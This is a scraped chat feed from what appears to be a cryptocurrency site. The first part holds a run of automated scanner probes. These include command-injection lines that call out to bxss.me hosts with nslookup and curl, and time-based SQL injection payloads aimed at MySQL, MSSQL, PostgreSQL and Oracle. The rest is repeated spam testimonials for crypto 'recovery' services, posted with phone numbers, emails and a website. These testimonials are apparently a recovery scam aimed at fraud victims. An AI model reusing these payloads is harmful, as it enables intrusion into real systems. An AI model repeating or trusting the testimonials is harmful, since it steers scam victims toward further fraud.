  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    $(nslookup -q=cname hitconyljxgbe60e2b.bxss.me||curl hitconyljxgbe60e2b.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    |(nslookup -q=cname hitrwbjjcbfsjdad83.bxss.me||curl hitrwbjjcbfsjdad83.bxss.me)

  • 09.10.25 08:18 pHqghUme

    |(nslookup${IFS}-q${IFS}cname${IFS}hitmawkdrqdgobcdfd.bxss.me||curl${IFS}hitmawkdrqdgobcdfd.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:19 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:22 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:23 pHqghUme

    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  • 09.10.25 08:24 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:24 pHqghUme

    e

  • 09.10.25 08:24 pHqghUme

    can I ask you a question please?-1 waitfor delay '0:0:15' --

  • 09.10.25 08:25 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    can I ask you a question please?9IDOn7ik'; waitfor delay '0:0:15' --

  • 09.10.25 08:26 pHqghUme

    can I ask you a question please?MQOVJH7P' OR 921=(SELECT 921 FROM PG_SLEEP(15))--

  • 09.10.25 08:26 pHqghUme

    e

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?64e1xqge') OR 107=(SELECT 107 FROM PG_SLEEP(15))--

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?ODDe7Ze5')) OR 82=(SELECT 82 FROM PG_SLEEP(15))--

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'"

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:28 pHqghUme

    @@olQP6

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891 from DUAL)

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891)

  • 09.10.25 08:30 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:33 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:35 pHqghUme

    e

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:40 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:40 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:41 pHqghUme

    e

  • 09.10.25 08:41 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:42 pHqghUme

    e

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 11.10.25 04:41 luciajessy3

    Don’t be deceived by different testimonies online that is most likely wrong. I have made use of several recovery options that got me disappointed at the end of the day but I must confess that the tech genius I eventually found is the best out here. It’s better you devise your time to find the valid professional that can help you recover your stolen or lost crypto such as bitcoins rather than falling victim of other amateur hackers that cannot get the job done. ADAMWILSON . TRADING @ CONSULTANT COM / WHATSAPP ; +1 (603) 702 ( 4335 ) is the most reliable and authentic blockchain tech expert you can work with to recover what you lost to scammers. They helped me get back on my feet and I’m very grateful for that. Contact their email today to recover your lost coins ASAP…

  • 11.10.25 10:44 Tonerdomark

    A thief took my Dogecoin and wrecked my life. Then Mr. Sylvester stepped in and changed everything. He got back €211,000 for me, every single cent of my gains. His calm confidence and strong tech skills rebuilt my trust. Thanks to him, I recovered my cash with no issues. After months of stress, I felt huge relief. I had full faith in him. If a scam stole your money, reach out to him today at { yt7cracker@gmail . com } His help sparked my full turnaround.

  • 12.10.25 01:12 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 12.10.25 01:12 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 12.10.25 19:53 Tonerdomark

    A crook swiped my Dogecoin. It ruined my whole world. Then Mr. Sylvester showed up. He fixed it all. He pulled back €211,000 for me. Not one cent missing from my profits. His steady cool and sharp tech know-how won back my trust. I got my money smooth and sound. After endless worry, relief hit me hard. I trusted him completely. Lost cash to a scam? Hit him up now at { yt7cracker@gmail . com }. His aid turned my life around. WhatsApp at +1 512 577 7957.

  • 12.10.25 21:36 blessing

    Writing this review is a joy. Marie has provided excellent service ever since I started working with her in early 2018. I was worried I wouldn't be able to get my coins back after they were stolen by hackers. I had no idea where to begin, therefore it was a nightmare for me. However, things became easier for me after my friend sent me to [email protected] and +1 7127594675 on WhatsApp. I'm happy that she was able to retrieve my bitcoin so that I could resume trading.

  • 13.10.25 01:11 elizabethrush89

    God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 13.10.25 01:11 elizabethrush89

    God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 14.10.25 01:15 tyleradams

    Hi. Please be wise, do not make the same mistake I had made in the past, I was a victim of bitcoin scam, I saw a glamorous review showering praises and marketing an investment firm, I reached out to them on what their contracts are, and I invested $28,000, which I was promised to get my first 15% profit in weeks, when it’s time to get my profits, I got to know the company was bogus, they kept asking me to invest more and I ran out of patience then requested to have my money back, they refused to answer nor refund my funds, not until a friend of mine introduced me to the NVIDIA TECH HACKERS, so I reached out and after tabling my complaints, they were swift to action and within 36 hours I got back my funds with the due profit. I couldn’t contain the joy in me. I urge you guys to reach out to NVIDIA TECH HACKERS on their email: [email protected]

  • 14.10.25 08:46 robertalfred175

    CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 14.10.25 08:46 robertalfred175

    CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 14.10.25 08:46 robertalfred175

    CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 15.10.25 18:07 crypto

    Cryptocurrency's digital realm presents many opportunities, but it also conceals complex frauds. It is quite painful to lose your cryptocurrency to scam. You can feel harassed and lost as a result. If you have been the victim of a cryptocurrency scam, this guide explains what to do ASAP. Following these procedures will help you avoid further issues or get your money back. Communication with Marie ([email protected] and WhatsApp: +1 7127594675) can make all the difference.

  • 15.10.25 21:52 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 15.10.25 21:52 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

Для участия в Чате вам необходим бесплатный аккаунт pro-blockchain.com Войти Регистрация
Есть вопросы?
С вами на связи 24/7
Help Icon